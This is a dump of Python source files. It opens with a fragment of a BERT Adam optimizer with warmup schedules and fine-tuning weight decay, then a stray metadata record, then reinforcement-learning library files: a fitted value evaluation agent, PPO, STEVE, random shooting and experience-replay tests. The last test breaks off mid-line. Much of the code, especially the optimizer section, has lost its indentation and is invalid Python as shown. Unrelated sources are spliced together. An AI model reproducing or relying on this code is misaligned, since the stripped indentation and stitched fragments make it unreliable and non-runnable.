from itertools import chain
def warmup_cosine(x, warmup=0.002):
if x < warmup:
return x/warmup
    return 0.5 * (1.0 + math.cos(math.pi * x))
def warmup_constant(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return max((x-1.)/(warmup-1.), 0)
SCHEDULES = {
'warmup_cosine': warmup_cosine,
'warmup_constant': warmup_constant,
'warmup_linear': warmup_linear,
}
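# Illustrative note: warmup_linear ramps the multiplier from 0 to 1 over the
# warmup fraction and then decays it linearly back to 0 by the end of training.
# A few spot values (x is the fraction of training completed):
#   warmup_linear(0.05, warmup=0.1) == 0.5   # halfway through warmup
#   warmup_linear(0.10, warmup=0.1) == 1.0   # warmup just finished
#   warmup_linear(0.55, warmup=0.1) == 0.5   # halfway through the decay
#   warmup_linear(1.00, warmup=0.1) == 0.0   # end of training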
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
"""
def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear', b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01, max_grad_norm=1.0):
if lr is not required and lr < 0.0:
raise ValueError(
"Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError(
"Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError(
"Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError(
"Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError(
"Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
# step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
# No bias correction
# bias_correction1 = 1 - beta1 ** state['step']
# bias_correction2 = 1 - beta2 ** state['step']
return loss
class BertAdamFineTune(BertAdam):
def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear', b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01, max_grad_norm=1.0):
self.init_param_group = []
super(BertAdamFineTune, self).__init__(params, lr, warmup,
t_total, schedule, b1, b2, e, weight_decay, max_grad_norm)
def save_init_param_group(self, param_groups, name_groups, missing_keys):
self.init_param_group = []
for group, name in zip(param_groups, name_groups):
if group['weight_decay'] > 0.0:
init_p_list = []
for p, n in zip(group['params'], name):
init_p = p.data.clone().detach()
if any(mk in n for mk in missing_keys):
print("[no finetuning weight decay]", n)
# should use the original weight decay
init_p.zero_()
init_p_list.append(init_p)
self.init_param_group.append(init_p_list)
else:
# placeholder
self.init_param_group.append([])
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for i_group, group in enumerate(self.param_groups):
for i_p, p in enumerate(group['params']):
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
if self.init_param_group:
update += group['weight_decay'] * \
(2.0 * p.data -
self.init_param_group[i_group][i_p])
else:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
# step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
# No bias correction
# bias_correction1 = 1 - beta1 ** state['step']
# bias_correction2 = 1 - beta2 ** state['step']
return loss
def load_state_dict_subset_finetune(self, state_dict, num_load_group):
r"""Loads the optimizer state.
Arguments:
state_dict (dict): optimizer state. Should be an object returned
from a call to :meth:`state_dict`.
"""
# deepcopy, to be consistent with module API
state_dict = deepcopy(state_dict)
# Validate the state_dict
groups = self.param_groups
saved_groups = state_dict['param_groups']
if len(groups) < num_load_group or len(saved_groups) < num_load_group:
raise ValueError("loaded state dict has a different number of "
"parameter groups")
param_lens = (len(g['params']) for g in groups[:num_load_group])
saved_lens = (len(g['params']) for g in saved_groups[:num_load_group])
if any(p_len != s_len for p_len, s_len in zip(param_lens, saved_lens)):
raise ValueError("loaded state dict contains a parameter group "
"that doesn't match the size of optimizer's group")
# Update the state
id_map = {old_id: p for old_id, p in
zip(chain(*(g['params'] for g in saved_groups[:num_load_group])),
chain(*(g['params'] for g in groups[:num_load_group])))}
def cast(param, value):
r"""Make a deep copy of value, casting all tensors to device of param."""
if isinstance(value, torch.Tensor):
# Floating-point types are a bit special here. They are the only ones
# that are assumed to always match the type of params.
if param.is_floating_point():
value = value.to(param.dtype)
value = value.to(param.device)
return value
elif isinstance(value, dict):
return {k: cast(param, v) for k, v in value.items()}
elif isinstance(value, container_abcs.Iterable):
return type(value)(cast(param, v) for v in value)
else:
return value
# Copy state assigned to params (and cast tensors to appropriate types).
# State that is not assigned to params is copied as is (needed for
# backward compatibility).
state = defaultdict(dict)
for k, v in state_dict['state'].items():
if k in id_map:
param = id_map[k]
state[param] = cast(param, v)
else:
state[k] = v
# handle additional params
        for k, v in self.state.items():
if k not in state:
state[k] = v
# do not change groups: {'weight_decay': 0.01, 'lr': 9.995e-06, 'schedule': 'warmup_linear', 'warmup': 0.1, 't_total': 400000, 'b1': 0.9, 'b2': 0.999, 'e': 1e-06, 'max_grad_norm': 1.0, 'params': [...]}
# # Update parameter groups, setting their 'params' value
# def update_group(group, new_group):
# new_group['params'] = group['params']
# return new_group
# param_groups = [
# update_group(g, ng) for g, ng in zip(groups[:num_load_group], saved_groups[:num_load_group])]
# # handle additional params
# param_groups.extend(groups[num_load_group:])
self.__setstate__({'state': state, 'param_groups': groups})
def find_state_dict_subset_finetune(org_state_dict, org_name_list, no_decay, param_optimizer):
# only use the bert encoder and embeddings
want_name_set = set()
for n in org_name_list:
if ('bert.encoder' in n) or ('bert.embeddings' in n):
want_name_set.add(n)
# original: name to pid, pid to name
org_grouped_names = [[n for n in org_name_list if not any(nd in n for nd in no_decay)],
[n for n in org_name_list if any(nd in n for nd in no_decay)]]
org_n2id, org_id2n = {}, {}
for ng, pg in zip(org_grouped_names, org_state_dict['param_groups']):
for n, pid in zip(ng, pg['params']):
org_n2id[n] = pid
org_id2n[pid] = n
# group by: whether pretrained; whether weight decay
g_np_list = [
[(n, p) for n, p in param_optimizer if n in want_name_set and not any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n in want_name_set and any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n not in want_name_set and not any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n not in want_name_set and any(
nd in n for nd in no_decay)],
]
optimizer_grouped_parameters = [
{'params': [p for n, p in g_np_list[0]], 'weight_decay': 0.01},
{'params': [p for n, p in g_np_list[1]], 'weight_decay': 0.0},
{'params': [p for n, p in g_np_list[2]], 'weight_decay': 0.01},
{'params': [p for n, p in g_np_list[3]], 'weight_decay': 0.0}
]
new_state_dict = {}
# regroup the original state_dict
new_state_dict['state'] = {pid: v for pid, v in org_state_dict['state'].items(
) if pid not in org_id2n or org_id2n[pid] in want_name_set}
# reset step count to 0
for pid, st in new_state_dict['state'].items():
st['step'] = 0
def _filter_group(group, g_np_list, i, org_n2id):
packed = {k: v for k, v in group.items() if k != 'params'}
packed['params'] = [pid for pid in group['params']
if pid in org_id2n and org_id2n[pid] in want_name_set]
assert len(g_np_list[i]) == len(packed['params'])
# keep them the same order
packed['params'] = [org_n2id[n] for n, p in g_np_list[i]]
return packed
new_state_dict['param_groups'] = [_filter_group(
g, g_np_list, i, org_n2id) for i, g in enumerate(org_state_dict['param_groups'])]
return new_state_dict, optimizer_grouped_parameters
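# Illustrative usage sketch: building BertAdam with the usual two parameter
# groups (no weight decay on biases and LayerNorm parameters), mirroring the
# `no_decay` convention used above; `model` and the step counts are placeholders.
def _example_build_optimizer(model, lr=3e-5, total_steps=10000):
    no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
    param_optimizer = list(model.named_parameters())
    optimizer_grouped_parameters = [
        {'params': [p for n, p in param_optimizer
                    if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
        {'params': [p for n, p in param_optimizer
                    if any(nd in n for nd in no_decay)], 'weight_decay': 0.0},
    ]
    return BertAdam(optimizer_grouped_parameters, lr=lr, warmup=0.1,
                    t_total=total_steps, schedule='warmup_linear')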
``` |
{
"source": "4kubo/rllib",
"score": 3
} |
#### File: agent/off_policy/fve_agent.py
```python
import torch.nn.modules.loss as loss
from torch.optim import Adam
from rllib.algorithms.fitted_value_evaluation import FittedValueEvaluationAlgorithm
from rllib.value_function import NNQFunction
from .off_policy_agent import OffPolicyAgent
class FittedValueEvaluationAgent(OffPolicyAgent):
"""Fitted value evaluation agent.
It just evaluates the critic collecting data using fitted td-learning.
References
----------
<NAME>., & <NAME>. (2008).
Finite-Time Bounds for Fitted Value Iteration. JMLR.
"""
def __init__(self, critic, policy, criterion=loss.MSELoss, *args, **kwargs):
super().__init__(*args, **kwargs)
self.algorithm = FittedValueEvaluationAlgorithm(
policy=policy,
critic=critic,
criterion=criterion(reduction="none"),
*args,
**kwargs,
)
self.policy = self.algorithm.policy
@classmethod
def default(cls, environment, policy, critic=None, lr=3e-4, *args, **kwargs):
"""See `AbstractAgent.default'."""
if critic is None:
critic = NNQFunction.default(environment)
optimizer = Adam(critic.parameters(), lr=lr)
return super().default(
environment,
policy=policy,
critic=critic,
optimizer=optimizer,
*args,
**kwargs,
)
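# Illustrative usage sketch (commented out): evaluating a fixed policy's value
# function with the default constructor, assuming an rllib GymEnvironment and a
# pre-trained `behaviour_policy` object are available.
# from rllib.environment import GymEnvironment
# environment = GymEnvironment("Pendulum-v1")
# agent = FittedValueEvaluationAgent.default(environment, policy=behaviour_policy)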
```
#### File: agent/tests/test_q_learning_agent.py
```python
import pytest
import torch
import torch.optim
import torch.testing
from rllib.agent import DDQNAgent, DQNAgent, QLearningAgent
from rllib.dataset import ExperienceReplay
from rllib.environment import GymEnvironment
from rllib.environment.mdps import EasyGridWorld
from rllib.policy import EpsGreedy, MellowMax, SoftMax
from rllib.util.training.agent_training import evaluate_agent, train_agent
from rllib.value_function import NNQFunction, TabularQFunction
NUM_EPISODES = 10
MAX_STEPS = 25
TARGET_UPDATE_FREQUENCY = 4
TARGET_UPDATE_TAU = 0.1
MEMORY_MAX_SIZE = 5000
BATCH_SIZE = 64
LEARNING_RATE = 0.001
GAMMA = 0.99
EPS_START = 1.0
EPS_END = 0.01
EPS_DECAY = 500
LAYERS = [64, 64]
SEED = 0
@pytest.fixture(params=["CartPole-v0", "NChain-v0"])
def environment(request):
return request.param
@pytest.fixture(params=[QLearningAgent, DQNAgent, DDQNAgent])
def agent(request):
return request.param
@pytest.fixture(params=[EpsGreedy, SoftMax, MellowMax])
def policy(request):
return request.param
def test_policies(environment, policy):
environment = GymEnvironment(environment, SEED)
critic = NNQFunction(
dim_state=environment.dim_observation,
dim_action=environment.dim_action,
num_states=environment.num_states,
num_actions=environment.num_actions,
layers=LAYERS,
tau=TARGET_UPDATE_TAU,
)
policy = policy(critic, 0.1)
optimizer = torch.optim.Adam(critic.parameters(), lr=LEARNING_RATE)
criterion = torch.nn.MSELoss
memory = ExperienceReplay(max_len=MEMORY_MAX_SIZE)
agent = DDQNAgent(
critic=critic,
policy=policy,
criterion=criterion,
optimizer=optimizer,
memory=memory,
batch_size=BATCH_SIZE,
target_update_frequency=TARGET_UPDATE_FREQUENCY,
gamma=GAMMA,
)
train_agent(
agent,
environment,
num_episodes=NUM_EPISODES,
max_steps=MAX_STEPS,
plot_flag=False,
)
evaluate_agent(agent, environment, 1, MAX_STEPS, render=False)
agent.logger.delete_directory() # Cleanup directory.
def test_tabular_interaction(agent, policy):
LEARNING_RATE = 0.1
environment = EasyGridWorld()
critic = TabularQFunction(
num_states=environment.num_states, num_actions=environment.num_actions
)
policy = policy(critic, 0.1)
optimizer = torch.optim.Adam(critic.parameters(), lr=LEARNING_RATE)
criterion = torch.nn.MSELoss
memory = ExperienceReplay(max_len=MEMORY_MAX_SIZE)
agent = agent(
critic=critic,
policy=policy,
criterion=criterion,
optimizer=optimizer,
memory=memory,
batch_size=BATCH_SIZE,
target_update_frequency=TARGET_UPDATE_FREQUENCY,
gamma=GAMMA,
)
train_agent(
agent,
environment,
num_episodes=NUM_EPISODES,
max_steps=MAX_STEPS,
plot_flag=False,
)
evaluate_agent(agent, environment, 1, MAX_STEPS, render=False)
agent.logger.delete_directory() # Cleanup directory.
torch.testing.assert_allclose(
critic.table.shape,
torch.Size([environment.num_actions, environment.num_states, 1]),
)
```
#### File: algorithms/mpc/random_shooting.py
```python
from .cem_shooting import CEMShooting
class RandomShooting(CEMShooting):
r"""Random Shooting solves the MPC problem by random sampling.
The sampling distribution is a Multivariate Gaussian and the average of the best
`num_elites' samples (action sequences) is returned.
In practice, this is just is the first step of the Cross Entropy Method (n_iter=1).
Parameters
----------
dynamical_model: state transition model.
reward_model: reward model.
num_model_steps: int.
Horizon to solve planning problem.
gamma: float, optional.
Discount factor.
num_particles: int, optional.
Number of particles for shooting method.
num_elites: int, optional.
Number of elite samples to keep between iterations.
termination: Callable, optional.
Termination condition.
terminal_reward: terminal reward model, optional.
warm_start: bool, optional.
Whether or not to start the optimization with a warm start.
default_action: str, optional.
Default action behavior.
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2018).
Neural network dynamics for model-based deep reinforcement learning with model-free
fine-tuning. ICRA.
<NAME>. (2005).
Robust constrained model predictive control. Ph. D.
<NAME>. (2009).
A survey of numerical methods for optimal control.
Advances in the Astronautical Sciences.
"""
def __init__(self, *args, **kwargs):
super().__init__(num_iter=kwargs.pop("num_iter", 1), *args, **kwargs)
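# Illustrative usage sketch (commented out): instantiating the random-shooting
# solver from the parameters documented above; `dynamical_model` and
# `reward_model` stand in for trained rllib models.
# solver = RandomShooting(
#     dynamical_model=dynamical_model,
#     reward_model=reward_model,
#     num_model_steps=25,
#     num_particles=400,
#     num_elites=40,
# )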
```
#### File: rllib/algorithms/ppo.py
```python
import torch
import torch.distributions
from rllib.dataset.datatypes import Loss
from rllib.util.neural_networks.utilities import resume_learning
from rllib.util.parameter_decay import Constant, ParameterDecay
from .trpo import TRPO
class PPO(TRPO):
"""Proximal Policy Optimization algorithm..
The PPO algorithm returns a loss that is a combination of three losses.
- The clipped surrogate objective (Eq. 7).
- The value function error (Eq. 9).
- A policy entropy bonus.
Parameters
----------
policy : AbstractPolicy
value_function : AbstractValueFunction
criterion: Type[_Loss], optional.
Criterion for value function.
epsilon: float, optional (default=0.2)
The clipping parameter.
monte_carlo_target: bool, optional. (default=False).
Whether to calculate the value targets using MC estimation or adv + value.
clamp_value: bool, optional. (default=False).
Whether to clamp the value estimate before computing the value loss.
lambda_: float, optional. (default=0.97).
Parameter for Advantage estimation.
gamma: float, optional. (default=1).
Discount factor.
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017).
Proximal policy optimization algorithms. ArXiv.
<NAME>., et al. (2020).
Implementation Matters in Deep Policy Gradients: A Case Study on PPO and TRPO. ICLR.
"""
def __init__(self, epsilon=0.2, clamp_value=False, *args, **kwargs):
super().__init__(
epsilon_mean=0, epsilon_var=0, kl_regularization=True, *args, **kwargs
)
if not isinstance(epsilon, ParameterDecay):
epsilon = Constant(epsilon)
self.epsilon = epsilon
self.clamp_value = clamp_value
def reset(self):
"""Reset the optimization (kl divergence) for the next epoch."""
super().reset()
# Resume learning after early stopping.
resume_learning(self.policy)
def actor_loss(self, trajectory):
"""Get actor loss."""
state, action, reward, next_state, done, *r = trajectory
_, ratio = self.get_log_p_and_ope_weight(state, action)
with torch.no_grad():
adv = self.returns(trajectory)
if self.standardize_returns:
adv = (adv - adv.mean()) / (adv.std() + self.eps)
# Compute surrogate loss.
adv = self.multi_objective_reduction(adv)
weighted_advantage = ratio * adv
clipped_advantage = ratio.clamp(1 - self.epsilon(), 1 + self.epsilon()) * adv
surrogate_loss = -torch.min(weighted_advantage, clipped_advantage)
        # Instead of TRPO's trust-region constraint, PPO takes the element-wise minimum above.
return Loss(policy_loss=surrogate_loss).reduce(self.criterion.reduction)
def get_value_prediction(self, observation):
"""Clamp predicted value."""
value_prediction = super().get_value_prediction(observation)
if self.clamp_value:
old_value_pred = self.critic_target(observation.state).detach()
value_prediction = torch.max(
torch.min(value_prediction, old_value_pred + self.epsilon()),
old_value_pred - self.epsilon(),
)
return value_prediction
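# Illustrative note: a self-contained sketch of the clipped surrogate objective
# used in actor_loss above (Eq. 7 of the PPO paper), with made-up numbers.
def _clipped_surrogate_example(epsilon=0.2):
    log_p_new = torch.tensor([-0.5, -1.5])
    log_p_old = torch.tensor([-1.0, -1.0])
    adv = torch.tensor([1.0, -2.0])
    ratio = (log_p_new - log_p_old).exp()
    weighted = ratio * adv
    clipped = ratio.clamp(1 - epsilon, 1 + epsilon) * adv
    return -torch.min(weighted, clipped).mean()  # about 0.2 for these numbers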
```
#### File: rllib/algorithms/steve.py
```python
import torch
from rllib.dataset.datatypes import Loss
from rllib.dataset.utilities import stack_list_of_tuples
from rllib.model.utilities import PredictionStrategy
from rllib.util.multiprocessing import run_parallel_returns
from rllib.util.value_estimation import n_step_return
from rllib.value_function import NNEnsembleQFunction
from .mve import MVE
class STEVE(MVE):
"""Stochastic Ensemble Algorithm using STEVE to calculate targets.
Overrides get_value_target() method.
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018).
Sample-efficient reinforcement learning with stochastic ensemble value
expansion. NeuRIPS.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
try:
num_q = self.critic_target.num_heads
except AttributeError:
num_q = 1
try:
num_models = self.dynamical_model.base_model.num_heads
except AttributeError:
num_models = 1
self.num_models = num_models
self.num_q = num_q
def model_augmented_critic_loss(self, observation):
"""Get Model-Based critic-loss."""
pred_q = self.base_algorithm.get_value_prediction(observation)
# Get target_q with semi-gradients.
with torch.no_grad():
target_q = self.get_value_target(observation)
if pred_q.shape != target_q.shape: # Reshape in case of ensembles.
assert isinstance(self.critic, NNEnsembleQFunction)
target_q = target_q.unsqueeze(-1).repeat_interleave(
self.critic.num_heads, -1
)
critic_loss = self.base_algorithm.criterion(pred_q, target_q)
return Loss(critic_loss=critic_loss)
def _get_member_target(self, model_idx, state, action, critic_target):
"""Get member target.
Notes
-----
Helper method to paralelize the calculation through processes.
"""
self.dynamical_model.set_head(model_idx)
self.reward_model.set_head(model_idx)
with torch.no_grad():
trajectory = self.simulation_algorithm.simulate(
state, self.policy, initial_action=action
)
observation = stack_list_of_tuples(trajectory, dim=state.ndim - 2)
n_step_returns = n_step_return(
observation,
gamma=self.gamma,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_loss.eta.item(),
reduction="none",
) # samples*batch x horizon x num_q
value = n_step_returns.reshape(
-1, 1, self.num_particles, self.num_model_steps, self.num_q
)
return value
def get_value_target(self, observation):
"""Rollout model and call base algorithm with transitions."""
critic_target = torch.zeros(
observation.state.shape[: -len(self.dynamical_model.dim_state)]
+ (
self.num_particles,
self.num_model_steps + 1,
self.num_models,
self.num_q,
)
) # Critic target shape B x (H + 1) x M x Q
td_return = n_step_return(
observation,
gamma=self.gamma,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_loss.eta.item(),
reduction="none",
)
td_samples = td_return.unsqueeze(-2).repeat_interleave(self.num_particles, -2)
td_model = td_samples.unsqueeze(-2).repeat_interleave(self.num_models, -2)
if td_model.shape != critic_target[..., -1, :, :].shape:
td_model = td_model.unsqueeze(1)
critic_target[..., -1, :, :] = td_model
with PredictionStrategy(
self.dynamical_model, self.reward_model, prediction_strategy="set_head"
), torch.no_grad():
state = observation.state[..., 0, :]
action = observation.action[..., 0, :]
value = run_parallel_returns(
self._get_member_target,
[(i, state, action, critic_target) for i in range(self.num_models)],
)
critic_target[..., :-1, :, :] = torch.stack(value, dim=4)
mean_target = critic_target.mean(dim=(2, 4, 5)) # (samples, models, qs)
weight_target = 1 / (self.eps + critic_target.var(dim=(2, 4, 5)))
weights = weight_target / weight_target.sum(-1, keepdim=True)
target_q = (weights * mean_target).sum(-1)
return target_q
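# Illustrative note: a self-contained sketch of the inverse-variance weighting
# applied just above, where horizons whose targets agree across models, critics
# and particles get larger weights (made-up numbers, the eps term dropped for brevity).
def _steve_weighting_example():
    mean_target = torch.tensor([[1.0, 1.2, 0.7]])  # per-horizon mean estimates
    var_target = torch.tensor([[0.1, 0.5, 2.0]])   # per-horizon variances
    weights = (1.0 / var_target) / (1.0 / var_target).sum(-1, keepdim=True)
    return (weights * mean_target).sum(-1)         # dominated by the low-variance horizon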
```
#### File: experience_replay/tests/test_experience_replay.py
```python
import numpy as np
import pytest
from rllib.dataset import ExperienceReplay
from rllib.dataset.datatypes import Observation
from rllib.dataset.transforms import (
ActionNormalizer,
MeanFunction,
RewardClipper,
StateNormalizer,
)
from rllib.environment import GymEnvironment
from rllib.util.rollout import step_env
def create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
):
"""Rollout an environment and return an Experience Replay Buffer."""
if discrete:
env = GymEnvironment("NChain-v0")
transformations = []
else:
env = GymEnvironment("Pendulum-v1")
transformations = [
MeanFunction(lambda state_, action_: state_),
StateNormalizer(),
ActionNormalizer(),
RewardClipper(),
]
memory = ExperienceReplay(
max_len, transformations=transformations, num_memory_steps=num_memory_steps
)
for _ in range(num_episodes):
state = env.reset()
for _ in range(episode_length):
action = env.action_space.sample() # sample a random action.
observation, state, done, info = step_env(
env, state, action, action_scale=1.0
)
memory.append(observation)
memory.end_episode()
return memory
def create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
):
"""Create a memory with `num_transitions' transitions."""
if discrete:
num_states, num_actions = dim_state, dim_action
dim_state, dim_action = (), ()
else:
num_states, num_actions = -1, -1
dim_state, dim_action = (dim_state,), (dim_action,)
memory = ExperienceReplay(max_len, num_memory_steps=num_memory_steps)
for _ in range(num_transitions):
observation = Observation.random_example(
dim_state=dim_state,
dim_action=dim_action,
num_states=num_states,
num_actions=num_actions,
)
memory.append(observation)
return memory
class TestExperienceReplay(object):
"""Test experience replay class."""
@pytest.fixture(scope="class", params=[True, False])
def discrete(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 4])
def dim_state(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 4])
def dim_action(self, request):
return request.param
@pytest.fixture(scope="class", params=[100, 20000])
def max_len(self, request):
return request.param
@pytest.fixture(scope="class", params=[0, 1, 5])
def num_memory_steps(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 64])
def batch_size(self, request):
return request.param
def _test_sample_batch(self, memory, batch_size, num_memory_steps):
observation, idx, weight = memory.sample_batch(batch_size=batch_size)
for attribute in observation:
if num_memory_steps == 0:
assert attribute.shape[:2] == (batch_size, 1)
else:
assert attribute.shape[:2] == (batch_size, num_memory_steps)
assert idx.shape == (batch_size,)
assert weight.shape == (batch_size,)
def test_sample_batch_from_episode(
self, discrete, max_len, num_memory_steps, batch_size
):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
self._test_sample_batch(memory, batch_size, num_memory_steps)
def test_sample_batch_from_transitions(
self, discrete, dim_state, dim_action, max_len, num_memory_steps, batch_size
):
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, 200
)
self._test_sample_batch(memory, batch_size, num_memory_steps)
def test_reset(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
assert memory.data_count == num_episodes * (episode_length + num_memory_steps)
if num_memory_steps == 0:
assert len(memory.valid_indexes) == min(max_len, memory.data_count)
else:
assert len(memory.valid_indexes) > 0
assert len(memory.valid_indexes) < len(memory)
assert memory.ptr != 0
assert not np.all(memory.memory == np.full((max_len,), None))
memory.reset()
assert memory.data_count == 0
assert len(memory.valid_indexes) == 0
assert memory.ptr == 0
assert np.all(memory.memory == np.full((max_len,), None))
def test_end_episode(
self, discrete, dim_state, dim_action, max_len, num_memory_steps
):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
ptr = memory.ptr
memory.end_episode()
assert ptr + num_memory_steps == memory.ptr
for i in range(num_memory_steps):
assert memory.valid[memory.ptr - i - 1] == 0
def test_append_invalid(
self, discrete, dim_state, dim_action, max_len, num_memory_steps
):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
memory.append_invalid()
assert memory.valid[(memory.ptr - 1) % max_len] == 0
assert memory.valid[(memory.ptr - 2) % max_len] == 1
def test_append(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
if discrete:
num_states, num_actions = dim_state, dim_action
dim_state, dim_action = (), ()
else:
num_states, num_actions = -1, -1
dim_state, dim_action = (dim_state,), (dim_action,)
observation = Observation.random_example(
dim_state=dim_state,
dim_action=dim_action,
num_states=num_states,
num_actions=num_actions,
)
memory.append(observation)
assert memory.valid[(memory.ptr - 1) % max_len] == 1
assert memory.valid[(memory.ptr - 2) % max_len] == 1
for i in range(num_memory_steps):
assert memory.valid[(memory.ptr + i) % max_len] == 0
assert memory.memory[(memory.ptr - 1) % max_len] is not observation
def test_len(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
assert len(memory) == min(max_len, num_transitions)
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
if num_memory_steps == 0:
assert len(memory) == len(memory.valid_indexes)
else:
assert len(memory) > len(memory.valid_indexes)
assert len(memory) == min(
